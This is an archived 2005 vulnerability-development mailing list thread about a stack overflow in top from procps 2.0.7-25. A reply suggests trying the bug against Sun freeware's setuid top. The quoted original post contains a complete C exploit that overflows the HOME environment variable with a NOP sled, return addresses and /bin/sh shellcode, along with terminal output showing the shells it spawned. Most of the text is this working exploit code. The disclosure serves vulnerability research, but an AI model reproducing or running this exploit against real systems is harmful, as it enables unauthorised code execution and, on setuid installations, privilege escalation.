Vulnerability Development mailing list archives
Re: top (procps-2.0.7-25) vulnerability
From: "KF (lists)" <kf_lists () digitalmunition com>
Date: Mon, 09 May 2005 11:36:09 -0400
Sheesh what is with top and folks not fixing OLD arse bugs. =]You may wanna check with William LeFebvre and make sure this issue is fixed in his latest code base.
Sun freeware ships top as setuid... you may wanna try to exploit this bug there. It *may* not be fixed.
Look familiar? http://www.securiteam.com/exploits/5JP0A2A2BW.html -KF WINNY THOMAS wrote:
While running top on a tool of mine to do a profiling test the top command ran into a segmentation fault. Icould find two instance where the command could misbehave 1. if you have junk data inside a file .toprc in your home directory 2. if your environmental variable HOME is set to a string that’s greater than 1024. I managed to spawn a shell out of top command by exploiting the second issue. If you compile and run the exploit code which I am including in the mail body you will get a shell. Incase you don’t you could pass parameters to the program as follows to adjust theoffset. The vulnerability detail is included in the codecomment [winnythomas@r8 WinnyThomas]$ ./putshellcode 1001 sh-2.05b$ exit exit [winnythomas@r8 WinnyThomas]$ ./putshellcode 120 Illegal instruction [winnythomas@r8 WinnyThomas]$ ./putshellcode 1010 sh-2.05b$ exit exit in most of the test I did on the vulnerable code I got shell on my system without passing any parameter to the program (that is the hardcoded offset of 1111 in my program worked well on my system) /* * Program: Proof of concept code for top exploit * Author: Winny Thomas, Nevis networks pune * Vulerability: in top.c the function get_optionsuses strcpy to copy the value of the * environment variable HOME into a static buffer that is allocated on the stack. hence * its possible to apply standard stack smashing attack to overwrite the return address * on the stack and execute a code which is of theattackers choice * NOTE: top is not setuid and hence the exploit wontspawn a root shell. * Tested on Red Hat 8 with procps verion 2.0.7-25. the problem has * been fixed in the latest versions** This code is for educational purpose only and the * author shall not bear any responsibility for any * damage caused by using this code*/ #include <stdio.h> #include <stdlib.h> char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; char exploit_variable[1200]; long get_esp(void) { __asm__("movl %esp, %eax"); } int main(int argc, char *argv[]) { long stackp, retaddr; char SETENV[1250]; long *ptr; int i, j, offset = 1111; if (argc > 1) offset = atoi(argv[1]); stackp = get_esp(); retaddr = stackp - offset; ptr = exploit_variable; for (i = 0; i < 1200; i += 4) *ptr++ = retaddr;for (i = 0; i < 600; i++) exploit_variable[i] = '\x90';for (j = 0 ;j < strlen(shellcode); j++, i++) exploit_variable[i] = shellcode[j]; sprintf(SETENV, "HOME="); strcat(SETENV, exploit_variable); putenv(SETENV); execl("/usr/bin/top", "top", (char *)0); }__________________________________ Do you Yahoo!? Make Yahoo! your home page http://www.yahoo.com/r/hs
Current thread:
- top (procps-2.0.7-25) vulnerability WINNY THOMAS (May 09)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability KF (lists) (May 10)
- Re: top (procps-2.0.7-25) vulnerability Ayaz Ahmed Khan (May 10)